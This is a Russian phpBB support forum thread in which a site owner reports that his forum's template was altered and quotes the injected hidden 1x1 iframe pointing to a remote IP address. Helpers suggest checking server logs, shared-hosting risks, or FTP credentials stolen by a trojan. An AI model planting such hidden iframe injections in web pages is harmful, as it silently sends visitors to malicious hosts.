Центр пользователя  |  Ваши сообщения  |  FAQ
Форум поддержки phpBB » phpBB 3.0.x » Поддержка phpBB 3.0.x

Что сделать для защиты форума

Помощь в установке, настройке и использовании phpBB 3.0.x
Пожалуйста, помните, что существуют: Поиск, Правила форума
Возможно, ответ на Ваш вопрос уже имеется: Документация, Статьи, Накопленный опыт
Полезные материалы по этой теме: Инструкция по установке форума, Конвертеры

Сообщение 13 янв 2010, 14:00

Здравствуйте,
у меня есть небольшой форум в зоне орг, жил себе пол года тихо никого не трогал, а сегодня при попытке зайти на него я был перенаправлен на яндыкс...вобщем методом проб и ошибок нарыл я редирект в шаблоне пхпбб

<iframe src="http://195.78.108.200/in.cgi?22" width=1 height=1 style="visibility: hidden"></iframe>

это было в хеадере,
дальше при попытке открыть этот юрл оказалось что это traffcount.cn, вобщем судя по всему у меня открыли доступ к админке форума, изменили шаблон и обновили кэш,
версия движка у меня 3.0.5, модов никаких не ставил, пароль 12 символов, текст по русски + цифры, подскажите что можно сделать для защиты форума :(
igrok

 

Сообщение 13 янв 2010, 14:12

а вы уверены что вас сломали через форум?
crash
Поддержка
 
Сообщений: 11348
Зарегистрирован:
27 янв 2009, 03:22
Благодарил (а): 1 раз.
Поблагодарили: 568 раз.

Сообщение 13 янв 2010, 14:39

дело в том что они фактически использовали только форум, в движок сайта они почему то ничего не добавили, да и то что вначале они поправили шаблон а потом обновили кэш наводит на мысли что это все таки было сделано их админки пхпбб....
у меня даже есть подозрение что это дело автоматизировано, вероятнее всего есть какой то эксплоит который позволяет получить доступ к админке и соотвественно к правке шаблонов

сканировал сайт Xspider-ом, уязвимостей не найдено
Последний раз редактировалось igrok 13 янв 2010, 17:11, всего редактировалось 1 раз.
igrok

 

СообщениеСообщение было удалено | удалил: Гость | 13 янв 2010, 17:11.
Причина: ss

Сообщение 13 янв 2010, 19:16

igrok
в phpbb3 пока не найдено дыр. Поэтому надо смотреть логи вебсервера и выяснять. Хотя если шред хостинг, то могли и через соседа поломать
crash
Поддержка
 
Сообщений: 11348
Зарегистрирован:
27 янв 2009, 03:22
Благодарил (а): 1 раз.
Поблагодарили: 568 раз.

Сообщение 17 ноя 2010, 06:31

crash писал(а):igrok
в phpbb3 пока не найдено дыр. Поэтому надо смотреть логи вебсервера и выяснять. Хотя если шред хостинг, то могли и через соседа поломать

Скорей всего вирус попал через фтп, доступ к которому он получил благодаря трояну на компе. Можно почитать здесь
bat

 

Сообщение 17 ноя 2010, 06:44

bat
как вы вовремя пришли.
crash
Поддержка
 
Сообщений: 11348
Зарегистрирован:
27 янв 2009, 03:22
Благодарил (а): 1 раз.
Поблагодарили: 568 раз.

Сообщение 17 ноя 2010, 06:47

crash писал(а):bat
как вы вовремя пришли.

лучше поздно, чем никогда.
в конце концов, остальные зашедшие сюда так же как я в поисках ответа все таки его получат.
bat

 

Сообщение 17 ноя 2010, 07:27

bat
видимо тогда плохо искали. вам даже гугль скажет что надо проверять. Я уже молчу что еще и от хостера много чего зависит
crash
Поддержка
 
Сообщений: 11348
Зарегистрирован:
27 янв 2009, 03:22
Благодарил (а): 1 раз.
Поблагодарили: 568 раз.

Сообщение 17 ноя 2010, 07:32

crash писал(а):bat
видимо тогда плохо искали. вам даже гугль скажет что надо проверять. Я уже молчу что еще и от хостера много чего зависит

хорошо искал, ничего по своему конкретному случаю не нашел (с javascript).
в любом случае тема исчерпала себя, вы мне лучше здесь помогите ;)
bat

 


Вернуться в Поддержка phpBB 3.0.x

 


  • Похожие темы
    Ответов
    Просмотров
    Последнее сообщение

Кто сейчас на форуме

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 6

Форум поддержки phpBB
2008 - 2017 © BB3x.ru - русская поддержка форума phpBB3
Создано на основе phpBB® Forum Software © phpBB Group
+ 17 предустановленных модов
+ SEO-оптимизация форума
+ авторизация через соц. сети
+ защита от спама